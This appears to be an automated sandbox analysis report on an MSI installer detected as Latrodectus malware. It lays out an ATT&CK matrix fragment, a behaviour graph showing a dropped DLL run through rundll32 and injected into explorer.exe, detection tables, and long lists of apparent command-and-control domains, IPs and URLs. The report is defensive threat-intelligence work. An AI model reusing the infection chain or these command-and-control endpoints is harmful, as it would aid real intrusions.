                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  System Network Configuration Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525187 Sample: das.msi Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 40 tiguanin.com 2->40 42 isomicrotich.com 2->42 44 2 other IPs or domains 2->44 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Yara detected Latrodectus 2->60 62 7 other signatures 2->62 8 rundll32.exe 2->8         started        10 msiexec.exe 14 40 2->10         started        14 msiexec.exe 2 2->14         started        signatures3 process4 file5 16 rundll32.exe 12 8->16         started        28 C:\Windows\Installer\MSIA029.tmp, PE32 10->28 dropped 30 C:\Users\user\AppData\...\vierm_soft_x64.dll, PE32+ 10->30 dropped 32 C:\Windows\Installer\MSI9F0E.tmp, PE32 10->32 dropped 34 3 other files (none is malicious) 10->34 dropped 66 Drops executables to the windows directory (C:\Windows) and starts them 10->66 20 msiexec.exe 10->20         started        22 MSIA029.tmp 10->22         started        signatures6 process7 dnsIp8 36 greshunka.com 82.115.223.39, 57458, 57459, 57460 MIDNET-ASTK-TelecomRU Russian Federation 16->36 38 bazarunet.com 80.78.24.30, 49701, 49702, 49703 CYBERDYNELR Cyprus 16->38 48 System process connects to network (likely due to code injection or exploit) 16->48 50 Contains functionality to inject threads in other processes 16->50 52 Injects code into the Windows Explorer (explorer.exe) 16->52 54 6 other signatures 16->54 24 explorer.exe 49 1 16->24 injected signatures9 process10 dnsIp11 46 isomicrotich.com 188.114.97.3, 443, 62255, 62257 CLOUDFLARENETUS European Union 24->46 64 System process connects to network (likely due to code injection or exploit) 24->64 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  das.msi0%ReversingLabs

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\vierm_soft_x64.dll8%ReversingLabs
                  C:\Windows\Installer\MSI9E30.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI9EBE.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI9EEE.tmp0%ReversingLabs
                  C:\Windows\Installer\MSI9F0E.tmp0%ReversingLabs
                  C:\Windows\Installer\MSIA029.tmp0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  https://excel.office.com0%URL Reputationsafe
                  https://word.office.com0%URL Reputationsafe
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  https://outlook.com0%URL Reputationsafe
                  https://android.notify.windows.com/iOS0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
                  http://x1.c.lencr.org/00%URL Reputationsafe
                  http://x1.i.lencr.org/00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  isomicrotich.com
                  		188.114.97.3
                  		truetrue
                    		unknown
                    greshunka.com
                    		82.115.223.39
                    		truetrue
                      		unknown
                      tiguanin.com
                      		80.78.24.30
                      		truetrue
                        		unknown
                        bazarunet.com
                        		80.78.24.30
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://isomicrotich.com/test/true
                            		unknown
                            https://opewolumeras.com/test/true
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://isomicrotich.com/test/2476756634-1003jexplorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://greshunka.com:8041/bazar.php%rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://isomicrotich.com/.7explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://isomicrotich.com/test/cexplorer.exe, 00000009.00000002.3805949216.0000000003256000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://greshunka.com:8041/admin.phpxrundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 00000009.00000000.1791266554.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3808408882.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://tiguanin.com:8041/admin.phpLrundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://greshunka.com:8041/bazar.php.rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://bazarunet.com:8041/bazar.phpsrundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://isomicrotich.com/explorer.exe, 00000009.00000003.3074047960.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C596000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmptrue
                                                      		unknown
                                                      https://isomicrotich.com/test/MenuArray_151436-explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://tiguanin.com:8041/admin.phpTrundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://excel.office.comexplorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://isomicrotich.com/1n8Jexplorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://isomicrotich.com/test/Oexplorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://tiguanin.com:8041/bazar.phprundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD284A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD284B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://tiguanin.com:8041/admin.phpl4rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bazarunet.com:8041/bazar.phpXrundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://bazarunet.com:8041/bazar.phpMMrundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://bazarunet.com:8041/bazar.phpQrundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://bazarunet.com:8041/urundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://bazarunet.com:8041/bazar.phpTrundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://isomicrotich.com/test/zexplorer.exe, 00000009.00000002.3805851465.0000000003249000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://bazarunet.com:8041/bazar.phpRrundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://tiguanin.com:8041/admin.phporundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://greshunka.com/S%rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://bazarunet.com:8041/Yrundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://isomicrotich.com/test/rexplorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://tiguanin.com:8041/bazar.phpiP5rundll32.exe, 00000006.00000002.3806960188.0000016AD28D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://wns.windows.com/explorer.exe, 00000009.00000000.1792832688.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3074047960.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://isomicrotich.com/test/sexplorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://greshunka.com/rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://isomicrotich.com/5117-2476756634-1003explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://bazarunet.com:8041/s%rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://bazarunet.com:8041/bazar.phpCrundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://greshunka.com:8041/bazar.phperundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://word.office.comexplorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://bazarunet.com:8041/net.com:8041/admin.phprundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://bazarunet.com:8041/Prundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://tiguanin.com:8041/azar.phprundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://r10.o.lencr.org0#rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://bazarunet.com:8041/admin.phpCryptographyrundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        https://bazarunet.com:8041/:rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://outlook.comexplorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://greshunka.com:8041/bazar.phprundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3318968115.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://isomicrotich.com/3explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://bazarunet.com:8041/bazar.phprundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://isomicrotich.com/test/Eexplorer.exe, 00000009.00000002.3811134225.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://tiguanin.com:8041/bazar.phpMrundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://tiguanin.com:8041/bazar.phpKrundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000003.2277712034.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000009.00000000.1792832688.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://tiguanin.com:8041/admin.php/4Qrundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://greshunka.com:8041/bazar.php6rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://www.advancedinstaller.comdas.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.drfalse
                                                                                                                                                		unknown
                                                                                                                                                https://isomicrotich.com/test/7explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://bazarunet.com:8041/in.com:8041/rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://greshunka.com:8041/rundll32.exe, 00000006.00000003.2241985447.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://tiguanin.com:8041/bazar.phpVrundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://bazarunet.com:8041/%rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://tiguanin.com:8041/bazar.phpTrundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://tiguanin.com:8041/jrundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://r10.i.lencr.org/0rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000009.00000003.2277712034.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://isomicrotich.com/Texplorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://tiguanin.com:8041/bazar.phpjrundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://bazarunet.com:8041/admin.phpIrundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://www.pollensense.com/explorer.exe, 00000009.00000000.1791266554.00000000071A4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://tiguanin.com:8041/:rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://bazarunet.com:8041/admin.phpCrundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
